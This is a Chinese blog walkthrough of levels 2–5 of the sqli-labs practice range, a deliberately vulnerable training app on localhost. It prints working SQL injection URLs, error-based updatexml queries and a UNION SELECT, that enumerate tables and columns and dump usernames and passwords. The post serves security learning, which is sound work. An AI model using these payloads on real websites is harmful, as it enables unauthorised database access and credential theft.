sqli-labs靶场通关攻略(2-5关)

已于 2024-08-16 09:01:03 修改
阅读量762 收藏 10
点赞数 12
文章标签: 数据库
于 2024-08-15 19:26:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Nai_zui_jiang/article/details/141228689
版权

第二关

进入后判断闭合方式

--+闭合成功

使用报错函数,报错函数里面三个参数,写三个1占位置

我们可以操控的是第二个参数的位置所以第二个参数的位置换成concat()函数,这个函数也有两个参数,写两个1占位置

我们可以操控的地方也是第二个参数的位置 把第二个参数的位置换成(),里面写我们的子查询语句 成功查出数据库名 后面查什么在子查询括号里面查就行

查表名http://127.0.0.1/Less-2/?id=1%20%20and%20updatexml(1,concat(1,(select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27)),1)--+

返回的结果超过一行,那么我们给table_name 加上group_concat成一个集合

http://127.0.0.1/Less-2/?id=1%20and%20updatexml(1,concat(1,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27)),1)--+

查列名

http://127.0.0.1/Less-2/?id=1%20and%20updatexml(1,concat(1,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27)),1)--+

查具体的username和password

http://127.0.0.1/Less-2/?id=1%20and%20updatexml(1,concat(1,(select%20group_concat(username,password)%20from%20users)),1)--+

第三关

首先确定闭合方式

判断字段列数 order by

只存在三列

那么我们查三列

页面显示的是id=1的数据,没有显示我们联合查询的数据,把人家前面查询的id的数据改成不存在的,比如-1

联合查询所有列

查询所有表中数据

http://127.0.0.1/Less-3/?id=-1%27)%20%20union%20select%201,2,group_concat(id,username,password)%20from%20users%20--+

第四关

也是同上的联合查询方法

第五关

发现有报我们就使用报错注入

获取数据库信息

使用报错函数,报错函数里面三个参数,写三个1占位置

我们可以操控的是第二个参数的位置所以第二个参数的位置换成concat()函数,这个函数也有两个参数,写两个1占位置

我们可以操控的地方也是第二个参数的位置 把第二个参数的位置换成(),里面写我们的子查询语句 成功查出数据库名 后面查什么在子查询括号里面查就行

查表名

返回的结果超过一行,那么我们给table_name 加上group_concat成一个集合

查列名

查具体的username和password

嘤嘤奶嘴酱
关注
  • 12
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs靶场练习笔记
11-09
### SQLi-Labs靶场练习笔记知识点概览 #### 一、SQL注入基本概念与原理 - **定义**:SQL注入是一种常见的应用层攻击方式,它利用编程中的漏洞,通过在应用程序的输入框中插入恶意SQL语句来控制后端数据库服务器。 -...
sqli-labs靶场
05-30
"sqli-labs靶场"是一个专门用于学习和测试SQL注入技术的平台,它提供了多种不同类型的SQL注入场景,帮助安全研究人员和开发人员了解并防御这种攻击。 在sqli-labs靶场中,用户可以实践各种SQL注入技巧,如错误注入...
webjs 数据库 离线读取本地数据库源码-SAAS 本地化及未来之窗行业应用跨平台架构
cybersnow精通 28 门计算机语言,凭借其超凡的技术能力,成功开发过上万个应用,广泛涉及政府、商业、个人等众多领域,甚至在检察院、环保局、公安局等专业场景中也大放异彩。不仅熟练掌握单片机和物联网开发,在软件架构设计方面更是独树一帜,自创了跨平台软件
08-15 246
【代码】webjs 数据库 离线读取本地数据库源码-SAAS 本地化及未来之窗行业应用跨平台架构。
旅游网站
weixin_43213064的博客
08-16 795
【代码】springboot旅游网站
mysql介绍
weixin_57763462的博客
08-14 365
丰富的存储引擎:MySQL 提供了多种存储引擎,如 InnoDB、MyISAM、Memory 等,每种存储引擎都有其特定的应用场景和优势。多语言支持:MySQL 支持多种编程语言,包括 C、C++、Python、Java、Perl、PHP 等,并提供了相应的 API。安全性:MySQL 提供了灵活的权限和密码系统,支持基于主机的验证,并且所有的密码传输都采用加密形式,确保了数据的安全性。管理工具:MySQL 提供了丰富的管理工具,如命令行客户端、图形界面管理工具等,方便用户进行数据库的管理和维护。
【Redis】Redis 初探:特性、应用场景与高并发架构演进之路
Hsusan的博客
08-13 926
在进⾏技术学习过程中,由于⼤部分读者没有经历过⼀些中⼤型系统的实际经验,导致⽆法从全局理解⼀些概念,所以本⽂以⼀个 “电⼦商务” 应⽤为例,介绍从⼀百个到千万级并发情况下服务端的架构的演进过程,同时列举出每个演进阶段会遇到的相技术,让⼤家对架构的演进有⼀个整体的认知,⽅便⼤家对后续知识做深⼊学习时有⼀定的整体视野。
MongoDB count 性能
galoiszhou的博客
08-14 608
在MongoDB 4.0之前,你可以继续使用count方法来统计文档数量。如果你在使用MongoDB 4.0或之后的版本,建议迁移到,以确保查询的准确性和性能。如果你仅需估算文档数量而不需要精确计数,是更高效的选择。
【Python使用】嘿马头条项目从到完整开发教程第1篇:简介,1. 内容【附代码文档】
一诺的博客
08-16 529
本教程的知识点为:简介 1. 内容 2. 目标 产品效果 ToutiaoWeb虚拟机使用说明 数据库 理解ORM 作用 思考: 使用ORM的方式选择 数据库 SQLAlchemy操作 1 新增 2 查询 all() 数据库 分布式ID 1 方案选择 2 头条 使用雪花算法 (代码 toutiao-backend/common/utils/snowflake) 数据库 Redis 1 Redis事务 基本事务指令 Python客户端操作 Git工用流 调试方法 JWT认证方案 JWT & JWS & JWE
SQL Server 时间算差值/常用函数
学习和分享
08-13 307
DATEDIFF()是计算时间差值的直接工具,而DATEADD()CONVERT()CAST()DATEPART()和EOMONTH()等函数则提供了额外的灵活性和控制能力,以满足更复杂的时间处理需求。
健身房管理系统
寒夜
08-13 844
【代码】springboot健身房管理系统
MySQL系统变量innodb_autoinc_lock_mode
zxrhhm的博客
08-14 758
`innodb_autoinc_lock_mode` 是 MySQL InnoDB 存储引擎的一个系统变量,它控制着自增(AUTO_INCREMENT)值的锁定机制。
基于JAVA生产制造执行系统设计与实现(源码+论文+讲解等)
程序员阿龙的博客
08-13 1087
当下,如果 还依然使用纸质文档来记录并且管理相信息,可能会出现很多问题,比如原始文件的丢失,因为采用纸质文档,很容易受潮或者怕火,不容易备份,需要花费大量的人员和资金来管理用纸质文档存储的信息,最重要的是数据出现问题寻找起来很麻烦,并且修改也困难,如果还这样操作会造成很大的资源浪费和经济损失。所以,对于本课题研究的产品生产制造信息的管理就需要有一款软件来代替手工操作,因此MES生产制造执行系统就应运而生。MES生产制造执行系统运用的工具包括Eclipse,Tomcat以及Navicat等。
企业架构MySQL读写分离
A1357924680_的博客
08-16 811
DAU : 2000 (每日活跃⽤户数) 之前业务中是单台 MySQL 提供服务,使用多台MySQL数据库务器,降低单台压力,实现集群架构的稳定性和高可用性 数据的一致性 完整性 replication通过业务比对和分析发现,随着活跃用户数增多,读取数据的请求变多,故着重解决读取数据的压力。基于主从复制的基础上,常见的数据库负载均衡使用的是读写分离方式。在业务代码中,数据库的操作,不直接连接数据库,而是先请求到中间件服务器(代理)由代理服务器,判断是读操作去从数据服务器,写操作去主数据服务器。
实训day21
最新发布
2201_75673097的博客
08-17 549
uid=997(mysql) gid=994(mysql) 组=994(mysql)2、为root账户刷新权限。
在 Docker 容器中使用 GreatSQL VIP
老叶茶馆
08-13 454
GreatSQL Docker 镜像不支持在 Docker 中使用 VIP 功能。原因如下:在 Docker 中,无法用 systemd 方式来启动 GreatSQL。在打包时,也没有将 mysqld 程序文件属主改为 root,并加上 setcap 提权。因此,想要在 Docker 中使用 GreatSQL VIP 的话,需要自行处理。下面介绍如何在 Docker 容器中使用 GreatSQL ...
Linux下载卸载MySql
dys000000的博客
08-17 920
先进入数据库 再将user表的host状态根据root用户改为% 代表准许远程连接。# -uroot 登录账号是root -p代表的是密码。配置远程链接 可以在本地navicat链接数据库。临时的密码 没有办法查看密码的规则。大写的字母小写的字母数字特殊符号8位。每个人的默认密码都是不一样的。改完之后重新刷新一下。
Pydantic serialisation 结合 tortoise-orm 使用文档
????Fender的博客????
08-16 1014
Pydantic serialisation 结合 tortoise-orm 使用文档
sqli-labs靶场通关
08-25
对于sqli-labs靶场通关,你需要具备一定的SQL注入的知识和技巧。以下是一些通关的步骤和提示: 1. 确保你已经安装了LAMP/WAMP/MAMP服务器环境,并将sqli-labs源码解压到Web服务器的根目录下。 2. 打开浏览器,访问sqli-labs的首页,通常是 http://localhost/sqli-labs/。 3. 在首页上,你会看到一系列的级别和挑战。从级别1开始,逐步挑战更高级别的注入漏洞。 4. 阅读每个级别的说明和提示,理解目标和漏洞类型。 5. 使用SQL注入的技巧来寻找漏洞并进行利用。一些常见的注入技巧包括:使用单引号、双引号绕过输入过滤、使用UNION SELECT语句、使用注释符绕过过滤、使用布尔盲注等。 6. 尝试不同的Payload(载荷)来获取敏感信息或执行恶意操作。例如,获取数据库的表名、列名、数据内容,或者尝试修改数据库中的数据。 7. 当你成功获取到键信息或者完成了特定的目标,即可认为通关。 需要注意的是,在进行sqli-labs靶场挑战时,请确保你在合法的环境中进行,不要尝试攻击他人的系统或进行非法活动。同时,及时备份并恢复你的环境,以防误操作导致数据丢失。 希望这些步骤和提示对你有所帮助!如有更多问题,请随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值